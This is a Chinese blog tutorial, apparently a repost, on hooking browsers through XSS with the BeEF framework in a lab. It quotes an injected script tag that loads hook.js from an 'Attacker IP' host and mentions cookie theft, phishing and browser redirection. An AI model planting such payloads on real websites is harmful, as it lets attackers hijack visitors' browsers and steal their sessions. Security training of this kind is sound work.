首页 > 其他 > 详细

xss利用——BeEF#stage1

时间:2019-07-08 00:37:42      阅读:126      评论:0      收藏:0      [点我收藏+]

简介

BeEF(The Browser Exploitation Framework缩写),攻击者可以对目标进行攻击测试,攻击成功以后会加载浏览器劫持会话,它扩展了跨站漏洞的利用,能HOOK很多浏览器(IE和Firefox等)并可以执行很多内嵌命令。

如果beef布置在公网服务器上,要修改配置文件,不然都可以登录访问控制台!

 

挂马

启动kali beef端(IP:192.168.187.149

技术分享图片

如果一个网站有XSS漏洞,然后你通过某种方式把你的payload(<script src="http://Attacker IP:3000/hook.js"></script>)发到这个有XSS漏洞的页面,受害者点击或者直接访问那个界面时,就会不断请求Attacker端的hook.js,以此实现盗cookie/钓鱼等操作。

Win2003(IP:192.168.187.148)的WWW主目录下有一网页1.html。

本地访问

 技术分享图片

 主机访问

技术分享图片

回到Attacker端,可以看见虚拟机win2003和主机win10都已上钩

技术分享图片

 

各部分解析

技术分享图片

1.online表示肉鸡在线,当访问者关闭恶意网页后,则转为offline下线状态。

2.记录所有登录过的肉鸡信息

3.

Detials可以看到肉鸡的详细信息

Logs当前肉鸡的信息

Commands:具体见下一篇文章《xss利用——BeEF#stage2》

跳转网页

Commands -> Browser -> Hooked domain -> Redirect Browser

技术分享图片

技术分享图片

 

配合msf拿shell

 

xss利用——BeEF#stage1

原文:https://www.cnblogs.com/p0pl4r/p/11148820.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!